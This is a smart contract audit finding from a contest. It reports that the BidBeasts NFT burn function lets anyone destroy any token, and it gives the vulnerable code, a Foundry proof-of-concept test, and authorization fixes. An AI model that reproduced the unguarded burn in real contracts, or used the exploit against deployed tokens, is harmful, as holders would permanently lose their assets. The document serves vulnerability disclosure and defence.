Bid Beasts

First Flight #49
Tags: Beginner Friendly, Foundry, Solidity, NFT
Submission Details
Severity: high
Valid

Anyone can burn the BidBeasts ERC721 token

Description

An attacker can burn any BidBeasts ERC721 token. The BidBeasts::burn function does not impose any restrictions on who can burn tokens.

@>  function burn(uint256 _tokenId) public {
        _burn(_tokenId);
        emit BidBeastsBurn(msg.sender, _tokenId);
    }
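The missing check is a caller authorization check. Below is an added example, not code from the BidBeasts project: a stand-in token with a burn that routes through OpenZeppelin's `_update` with `msg.sender` as `auth`, plus a Foundry test showing that a stranger's burn now reverts while the owner's still succeeds. The contract name, symbol, mint helper and test addresses are assumptions for the demo; OpenZeppelin v5 is assumed, matching the `draft-IERC6093` import used in the PoC.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";
import {ERC721} from "@openzeppelin/contracts/token/ERC721/ERC721.sol";
import {IERC721Errors} from "@openzeppelin/contracts/interfaces/draft-IERC6093.sol";

// Stand-in for the BidBeasts token (name, symbol and mint helper are assumed).
contract BidBeastsFixed is ERC721 {
    event BidBeastsBurn(address indexed caller, uint256 indexed tokenId);

    constructor() ERC721("BidBeasts", "BB") {}
    // Unguarded mint, for the demo only.
    function mint(address to, uint256 tokenId) external {
        _mint(to, tokenId);
    }

    // Hardened burn: passing msg.sender as `auth` makes OpenZeppelin's _update run its
    // authorization check, reverting with ERC721InsufficientApproval unless the caller is
    // the owner, the approved address or an approved operator. `_burn` does no such check.
    function burn(uint256 tokenId) public {
        _update(address(0), tokenId, msg.sender);
        emit BidBeastsBurn(msg.sender, tokenId);
    }
}

contract BidBeastsFixedTest is Test {
    BidBeastsFixed nft;
    address owner = makeAddr("owner");
    address attacker = makeAddr("attacker");
    uint256 constant TOKEN_ID = 1;
    function setUp() public {
        nft = new BidBeastsFixed();
        nft.mint(owner, TOKEN_ID);
    }

    function testAttackerCannotBurn() public {
        vm.prank(attacker);
        vm.expectRevert(abi.encodeWithSelector(IERC721Errors.ERC721InsufficientApproval.selector, attacker, TOKEN_ID));
        nft.burn(TOKEN_ID);
        assertEq(nft.ownerOf(TOKEN_ID), owner); // token survives the attempt
    }

    function testOwnerCanStillBurn() public {
        vm.prank(owner);
        nft.burn(TOKEN_ID);
        vm.expectRevert(abi.encodeWithSelector(IERC721Errors.ERC721NonexistentToken.selector, TOKEN_ID));
        nft.ownerOf(TOKEN_ID);
    }
}
```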

Risk

Likelihood:

The likelihood is high because anyone can burn any of the ERC721 BidBeasts at any time. There are no restrictions.

Impact:

The impact is also high: a burned token is destroyed permanently, so holders lose their assets and the marketplace built on them is disrupted.

Proof of Concept

Add the following to the test file BidBeastsMarketPlaceTest.t.

First, add the import

import {IERC721Errors} from "@openzeppelin/contracts/interfaces/draft-IERC6093.sol";

then add the following test function

function testCanBurnAnyToken() public {
    _mintNFT();
    assertEq(nft.ownerOf(TOKEN_ID), SELLER);

    // An address with no ownership or approval burns the seller's token.
    vm.prank(makeAddr("attacker"));
    nft.burn(TOKEN_ID);

    // The token no longer exists.
    vm.expectRevert(abi.encodeWithSelector(IERC721Errors.ERC721NonexistentToken.selector, TOKEN_ID));
    nft.ownerOf(TOKEN_ID);
}

and run

forge test --mt testCanBurnAnyToken

Recommended Mitigation

Remove the BidBeasts::burn function:

- function burn(uint256 _tokenId) public {
- _burn(_tokenId);
- emit BidBeastsBurn(msg.sender, _tokenId);
- }
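Review bot: deleting the whole function also removes burning for legitimate token owners, while the description only faults the missing caller check. If burning is a wanted feature, an alternative to this hunk is to keep `burn` and authorize the caller before destroying the token, for example the OpenZeppelin v5 ERC721Burnable pattern `_update(address(0), _tokenId, msg.sender)` in place of `_burn(_tokenId)`, which reverts unless msg.sender is the owner, the approved address or an approved operator; the `emit BidBeastsBurn(msg.sender, _tokenId)` line can then stay as is.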

Updates

Lead Judging Commences

cryptoghost Lead Judge 30 days ago
Submission Judgement Published
Validated
Assigned finding tags:

BidBeasts ERC721: Anyone Can Burn

In the BidBeasts ERC721 implementation, the burn function is publicly accessible, allowing any external user to burn NFTs they do not own. This exposes all tokens to unauthorized destruction and results in permanent asset loss.
